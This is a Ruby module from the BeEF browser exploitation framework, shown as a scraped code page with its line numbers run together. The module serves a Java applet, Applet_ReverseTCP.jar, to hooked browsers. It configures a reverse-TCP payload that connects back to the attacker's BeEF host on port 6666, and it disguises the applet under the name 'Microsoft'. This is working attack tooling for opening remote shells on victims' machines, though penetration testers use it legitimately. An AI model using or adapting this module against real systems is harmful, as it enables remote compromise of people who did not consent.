Path: blob/master/modules/exploits/local_host/java_payload/module.rb
1154 views
#1# Copyright (c) 2006-2025 Wade Alcorn - [email protected]2# Browser Exploitation Framework (BeEF) - https://beefproject.com3# See the file 'doc/COPYING' for copying permission4#5class Java_payload < BeEF::Core::Command6def pre_send7BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')8end910def self.options11@configuration = BeEF::Core::Configuration.instance12beef_host = @configuration.beef_host13[14{ 'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP' },15{ 'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host },16{ 'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666' },17{ 'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32) },18{ 'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft' }19]20end2122def post_execute23save({ 'result' => @datastore['result'] })24end25end262728